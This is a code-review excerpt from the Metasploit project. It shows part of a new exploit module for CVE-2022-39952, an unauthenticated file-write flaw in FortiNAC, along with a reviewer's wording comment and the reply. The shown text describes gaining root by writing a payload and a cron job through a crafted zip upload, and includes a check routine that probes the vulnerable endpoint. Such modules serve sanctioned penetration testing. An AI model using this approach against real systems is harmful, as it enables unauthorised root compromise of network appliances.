modules/exploits/linux/http/fortinac_keyupload_file_write.rb

```diff
@@ -0,0 +1,149 @@
+          This module uploads a payload to the /tmp directory in addition to a cron job
+          to /etc/cron.d which executes the payload in the context of the root user.
+
+          The core vulnerability is an arbitrary file write issue in /configWizard/keyUpload.jsp which
+          is accessible remotely and without authentication. When you send the vulnerable
+          endpoint a zip file, it will extract an attacker controlled file to a directory
+          of the attackers choice on the target system.
+
+          This issue is exploitable on the following versions of FortiNAC:
+
+          FortiNAC version 9.4 prior to 9.4.1
+          FortiNAC version 9.2 prior to 9.2.6
+          FortiNAC version 9.1 prior to 9.1.8
+          FortiNAC 8.8 all versions
+          FortiNAC 8.7 all versions
+          FortiNAC 8.6 all versions
+          FortiNAC 8.5 all versions
+          FortiNAC 8.3 all versions
+        },
+        'Author' => [
+          'Gwendal Guégniaud', # discovery
+          'Zach Hanley',       # PoC
+          'jheysel-r7'         # module
+        ],
+        'References' => [
+          ['URL', 'https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/'],
+          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-300'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-39952'],
+          ['URL', 'https://attackerkb.com/topics/9BvxYuiHYJ/cve-2022-39952'],
+          ['CVE', '2022-39952']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux python],
+        'Privileged' => true,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8443,
+          'WfsDelay' => '75'
+        },
+        'Arch' => [ ARCH_CMD, ARCH_X64, ARCH_X86 ],
+        'Targets' => [
+          [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-02-16',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'configWizard', 'keyUpload.jsp'),
+      'method' => 'POST'
+    })
+
+    return Exploit::CheckCode::Unknown('Target did not respond') unless res
+    return Exploit::CheckCode::Safe("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
+    return Exploit::CheckCode::Appears('Target indicated a successful upload occurred!') if res.body.include?('yams.jsp.portal.SuccessfulUpload')
+
+    Exploit::CheckCode::Safe('The target responded with a 200 OK message, however it did not appear to indicate that a successful upload occurred!')
```

Comment:
I might adjust this to state that its a blank payload to be clear we aren't actually uploading anything at this point. The statement as its worded atm might concern people if they think its uploading a actual payload, which can be easily misinterpreted from the current wording.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/17750/commits/3bd4c15704d987f55336e1da839934937602928b